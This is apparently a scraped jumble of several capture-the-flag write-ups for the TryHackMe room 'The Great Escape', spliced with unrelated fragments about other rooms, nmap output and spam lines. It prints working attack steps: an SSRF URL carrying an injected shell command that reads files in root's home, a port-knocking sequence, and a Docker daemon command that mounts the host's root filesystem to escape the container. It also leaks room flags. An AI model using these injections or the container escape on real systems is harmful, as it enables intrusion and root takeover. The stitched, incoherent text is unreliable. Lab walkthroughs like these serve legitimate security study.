Let’s take a look. This we can find with some quick Googling. Hello, i was subscribed in tryhackme for 3 months and in my opinion if a subscription is affordable for you I highly suggest you buy it, although most of the content in the platform is free,the subscription gives some cool things like: there are some subscription only rooms that cover super great content, the learning paths can guide you to understand some interesting subjects, deployed rooms . So now I know that I am root on this machine. git, After trying a bunch of file uploads with various formats, I decided to give up on this portion and do some more research. 22/tcp open ssh Some lazy developers will simply use a system call to curl or similar. The first two flags were fairly easy to get (thank you Python). I did not get any response either from port 80 or 22. nmap also reveals the robot.txt file contents on the HTTP web server, showing 3 disallowed entries: Let’s note these entries for now and visit the web server: Looks like we have a photography website! I first listed out the files in the /root directory: There is an interesting file called dev-note.txt. Docker is an extremely useful tool which allows us to isolate applications from each other and the host OS without having to resort to virtual machines. Enumeration First added the IP to hosts file <ip> : escape.thm Nmap # nmap --min-rate=3000 -sV -sC -o nmap escape.thmNmap scan report for escape.thm Host is up (0.17s latency). In the Wikipedia page, there is a list of common well-known URIs. For Education. The Great Escape is a medium rated Linux based room on tryhackme by hydragyrum. I then moved to root directory and found the 3rd flag over there. Please report any incorrect results at https://nmap.org/submit/ . I hosted a HTTP server on my local machine, then inputted my IP address into the upload form. I checked for the other protocols like file,zip,gopher, but all of them gave some sort of error. What if you could REALLY customize your new Touch Bar? I then decided to run GoBuster on the /api portion of the site, but to no avail. More information here: Endlessh: An SSH Tarpit. So let's jump straight to TryHackMe and deploy the machine here is the link for the machine: https://www.tryhackme.com/room/rrootme TASK-1: Deploy the Machine Start the machine. Apparently there’s something responding at the other end! Awk Command. Refresh the page, check Medium 's site. We can successfully list the docker images using the API. I created a short Python script so I could execute this from the terminal (just to make my life easier, I was almost at my wits end at this point). Take a look at my article on the subject. Let’s take a look: Interesting! When we go to the nginx directory, we can see that there is a hidden directory called .well-known which is what the flag 1 hint was referring to. I then grabbed an interactive session with sh: I navigated to this directory and had a look around. THM is far more of a hold your hand as you learn experience. Port Scan Full Port Scan It has an interesting SSRF for foothold, then we need to enumerate the system through command injection in a hidden API. Alpine (https://alpinelinux.org/) is a Linux distribution built around musl libc and BusyBox. Link for the room here. There wasn’t a whole lot to this site (on the face of it at least); just a homepage, a login/sign-up page. We can see that are three commits. I was getting re-trained from a 11 years long business, marketing and hospitality background pursuing the yearned dream of becoming a pentester. This basically made any automated brute-forcing tools like gobuster and hydra unusable. Another common file on servers is the robots.txt file. December 5, 2021 It's an open telnet connection! /exif on the internal port 8080. Frankly, I learned new… classroom A Simple Web App Start off with a simple webapp. Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. TryHackMe - The Great Escape (Medium) 15 Feb 2021in Write-Upson Write-up, Docker, Pentesting, Ethical-hacking, Beginner A medium level room showcasing Docker container escape.! This is a write up for the Exploiting Telnettask of the Network Servicesroom on TryHackMe. docker -H 10.10.50.223:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt bash, Boom we can escape the docker. THM{c62517c0cad93ac93a92b1315a32d734}, Android OTA payload dumping / extraction: 4 tools review, $ sudo pacman -S gtfoblookup docker curl nmap burpsuite ssrf-sheriff ruby-httpclient. Once done with that, we can open an exposed docker daemon via port knocking and exploit that to escape the containerized enviroment. (hint: yes.). We are essentially mounting the hosts “/” directory to the “/mnt” dir in a new container, chrooting and then connecting via a shell (Reference — Task 9). You can find me on:LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/ Twitter:- https://twitter.com/shamsherkhannnTryhackme:- https://tryhackme.com/p/Shamsher, For more walkthroughs stay tuned…Before you go…. docker, I completed this through TryHackMe. [logo2](/assets/images/write-ups/tryhackme/the_great_escape/logo2.png) * Enumeration {:.toc} # Intro Welcome to my first write-up on a medium-level box by TryHackMe. If we see what is in the home directory for current user, you’ll see a dev-note.txt file. But we see a major flaw here, the docker port is “wide” open. For now I don't know, but with the error message I get I know it's a Java backend: class +Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port. This likely indicates that there’s maybe some rate limiting going on with the login uri, especially since manually logging in returns a 401. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 11:27 CET, Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds, $ export DOCKER_HOST=tcp://10.10.70.53:2375, CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES, 49fe455a9681 frontend "/docker-entrypoint.…" 2 months ago Up 2 hours 0.0.0.0:80->80/tcp dockerescapecompose_frontend_1, 4b51f5742aad exif-api-dev "./application -Dqua…" 2 months ago Up 2 hours dockerescapecompose_api-dev-backup_1, cb83912607b9 exif-api "./application -Dqua…" 2 months ago Up 2 hours 8080/tcp dockerescapecompose_api_1, 548b701caa56 endlessh "/endlessh -v" 2 months ago Up 2 hours 0.0.0.0:22->2222/tcp dockerescapecompose_endlessh_1, REPOSITORY TAG IMAGE ID CREATED SIZE, exif-api-dev latest 4084cb55e1c7 2 months ago 214MB, exif-api latest 923c5821b907 2 months ago 163MB, frontend latest 577f9da1362e 2 months ago 138MB, endlessh latest 7bde5182dc5e 2 months ago 5.67MB, nginx latest ae2feff98a0c 3 months ago 133MB, debian 10-slim 4a9cd57610d6 3 months ago 69.2MB, registry.access.redhat.com/ubi8/ubi-minimal 8.3 7331d26c1fdf 3 months ago 103MB, alpine 3.9 78a2ce922f86 10 months ago 5.55MB. There is also a suspicious dev-note.txt file in the /root directory. Made with love and coffee from somewhere near Edinburgh, UK. Task 2 - Understanding NFS. Author Ee En Goh TryHackMe Room (s) solved Read data files from: /usr/bin/../share/nmap Well this is awkward. If you do an aggressive nmap scan on port 22, you’ll see that it marks ssh with a question mark meaning it’s not sure if it actually is ssh. Unfortunately for us, we can’t read this file since it contains a banned word (probably some filter of sorts). You can read part one here Linux Fundamentals Part 1. | GenericLines: |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) Tryhackme The Great Escape | Razor-Sec Tryhackme The Great Escape Written by Razor-Admin on 19 Feb 2021 Summary Introduction Scanning Nmap Enumeration Fuzzing SSRF Docker Access Docker Escape From Docker Introduction This is partical room from tryhackme entitled "The Great Escape" with Medium difficulty. Port Knocking, I tried to run a gobuster directory scan on the web server: Unfortunately, the scan was not working as the web server was returning a status code of 200 for every attempt, even if the attempted directory did not exist. 1 minute read. Once the command is run, we are placed in a privileged shell within a newly created alpine container. THM{b801135794bf1ed3a2aafaa44c2e5ad4}. Since there was rate limiting implemented, I did not bother to go down that path. ADAT is a small tool used to assist CTF players and Penetration testers with easy commands to run against an Active Directory Domain Controller. Interested in gaining a new perspective on things? We just need to knock the right ports which should open up the docker tcp port. What welcome message do we receive? Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-15 21:16 +0545 So /api/exif exposed on port 80 must be the same API as It consists of tons of rooms, which are virtual classrooms dedicated to particular cybersecurity topics, with different difficulties. username Let’s try! I uploaded a PNG image and the app gave the information about the image. We can then navigate to /mnt/root to access the /root directory on the real machine. An error occurred: sun.net.www.protocol.file.FileURLConnection cannot be cast to java.net.HttpURLConnection. SMTP stands for "Simple Mail Transfer Protocol". . But I quickly discovered /robots.txt giving some interesting paths to try: I retrieved the source code of the upload form at /exif-util.bak.txt. The root file system of the host will be mounted on the /mnt directory of the container and the root of the container is changed to /mnt. I used nmap for this: From the above, it shows that the machine is open on ports 22 (ssh) and 80 (web page). Clicking into it there’s a login form. Description: The resulting is a root shell. I first had a look to see if there were any image files available. https://tryhackme.com/room/thegreatescape Steps There are obviously multiple ways to do this challenge and I would strongly recommend that you look at other published writeups to learn the different ways you can tackle this, especially the final part. Our nmap scan showed us the presence of this file with a few disallowed entries, let’s take a closer look: We already know about the api route, but what’s this exif-util thing? RustScan & Ciphey. These .bak files are mostly created by a program that needs to store backups. "http://api-dev-backup:8080/exif?url=noraj; lrwxrwxrwx 1 root root 9 Jan 6 20:51 .bash_history -> /dev/null, -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc, drwxr-xr-x 1 root root 4.0K Jan 7 16:48 .git, -rw-r--r-- 1 root root 53 Jan 6 20:51 .gitconfig, -rw-r--r-- 1 root root 148 Aug 17 2015 .profile, -rw-rw-r-- 1 root root 201 Jan 7 16:46 dev-note.txt. The Hydra's Head The Great Escape - TryHackMe January 7, 2021 17-minute read Writeups writeup • security • tryhackme Docker, Networks, and Container Escapes; Oh My! Also the file can be included by an URL. Task 6: Sudo -Shell Escape Sequence. We can try using git commands to enumerate more information about the repo: (The -C option is needed as we are trying to run git from outside the directory that hosts the repository. Here I have created a container from frontend image on an interactive mode executing sh binary. Clicking around throws everything else to the login page, so that’s a no go. SignUp Wreath. As we can see there is knocked ports. Refresh the page, check Medium 's site status, or. We can’t use tools like Gobuster for this room, which means we probably don’t need to brute-force the name of the files. I didn’t really know how to proceed at this point, so I decided to take a break and come back to it the next day. SSRF, /api/exif?url=http://api-dev-backup:8080/exif?url=1. The first thing I did was to see what was happening on the machine. images As you can see, Hydra made a few commit, adding a flag, removing the flag and fixing the dev note. As I was manually poking, I got reponse from port 8080. bruteforcing, In this post, I will be explaining each of the vulnerabilities and initial exploitation methods for the boxes, ranging from easy, to hard. In this video walk-through, we covered Sandbox Detection and Evasion Technique such as sleeping functions, system and network enumeration as part of TryHackMe Sandbox Evasion Challenge.. Going to port 80 shows us a website, PHOTO Classroom. Question: Download the above given file, and use awk command to print the following output: ippsec:34024 john:50024 thecybermentor:25923 liveoverflow:45345 nahamsec:12365 stok:1234. All the errors that I saw earlier were default 403 and 503 errors but this is different. Now for looking the flag of web we can access frontend in the docker. I restarted my docker service by stopping it and then starting it again after waiting for at least 30 seconds. Refresh the page, check Medium 's site status, or find something. |_http-server-header: nginx/1.19.6 Although the response is a 400, let’s try some other inputs, such as a blank url. From the edited dev-note.txt file, we can also see a port-knocking sequence that will grant us access to a docker tcp port. Since this is a development backup I tried different injection techniques. Let’s take a look: The upload functionality did not helped much. 1. Read data files from: /usr/bin/../share/nmap. The command to do so is: -H: used to indicate the host that is running docker, -it: used to spawn an interactive container (that we can use like a shell), --rm: used to remove the mount on the image after exiting, -v /root:/mnt/root: mount the /root directory on the real machine to /mnt/root on the container, alpine:3.9: indicate which image to use for the container. 80/tcp open http nginx 1.19.6 Now let’s take a look the webserver : Now i found robots.txt and contain different directory and file : wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.50.223/FUZZ.bak.txt Since exif tool can accept a URL as we tried earlier, we can use a default parameter, url, to send a GET request to the url we found earlier. TryHackMe. SSRF along with code injection was used to get a root shell on a docker container. (http://api-dev-backup:8080/exif). Taking a closer look, we see this particular line: Looks like we have an internal host that is accessible by the web server! One proposed standard is the security.txt file which should be placed in the .well-known directory. When I uploaded an image using a URL, it returned something like this: I then began to run a bunch of other stuff to confirm that they are interpreted by the URL. We can do that with curl: The -I option is used to indicate a HEAD request. After run we check again the port of docker, Now port of docker is open, Now lets check this. Note : Replace the IP Address in the script with the TryHackMe VPN IP Address which can be found by running "ip a show tun0" on your Kali machine and looking under inet. All rights reserved. © 2022 Subtle Labs. I wanted to explore the concept of a Docker Escape. So, lets check those out. It is utilised to handle the sending of emails. (Though send me a message if you do find a way to get something with this route ;)). I tried looking for various backup files for each of the pages on the site and eventually stumbled across the .bak file for exif-util: I continued to try some more combos with the urls I found earlier but I didn’t get anywhere. I now realised what the clue was hinting at. TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser! Lets try other payloads. So, I manually started going through the container. PORT STATE SERVICE Let’s think a bit about the information we have. Welcome, and first of all thanks for your interest in me! We can upload file from machine or from URL, Testing with an HTML file from machine returns 503 error, 1) Get any image > I got blue.png> cp to /thegreatescape/uploads folder So, I manually started going through the container. or SSH. I’m make little script for knocking : Let’s run this : ./knock 10.10.50.223. And as we can see there is curl, Now we can check id with command echo;id, And we get id of app, So we can use SSRF.Now after i looking around i’m found dev-note.txt in here http://10.10.50.223/api/exif?url=http://api-dev-backup:8080/exif?url=echo;cd%20/;cat%20/root/dev-note.txt, Then in directory of root i found .git, Now let’s check this SF:ricLines,18,"im4\+\x20\^1a}wVQbdyQ/{VY! Well-known URIs are simple ways for webservers to hold metadata that any user-agent can access. Let’s upload an image to see: The API does something, but it’s unlikely that we’ll be able to get any malicious content onto the system that way. We can then navigate to /mnt/root to access the /root directory on the real machine. Inside the container, we have free reign to grab the final flag. Nmap scan report for 10.10.207.95 Trying something like admin:password calls an api which returns a 401: Unauthorized response. Let’s take a closer look at our root directory, as the note did say that the files were removed. 2) dockerescapecompose_frontend_1, Per the hint in first flag, there is a .well-known in front end. Then we can access the docker. The Great Escape : TryHackMe 10 minute read Our devs have created an awesome new site. Only two ports are open. 2) run python3 -m http.server > this will run an HTTP server with my IP TryHackMe is a multipurpose platform where a user is able to learn, practice, compete, and create content related to cybersecurity. We can see a URL here with a similar api to the current exif-util GET call we saw before. 3) navigate to
Tiktok Female Voice Generator, Locatelli Franco Perché Parla Così,
the great escape tryhackme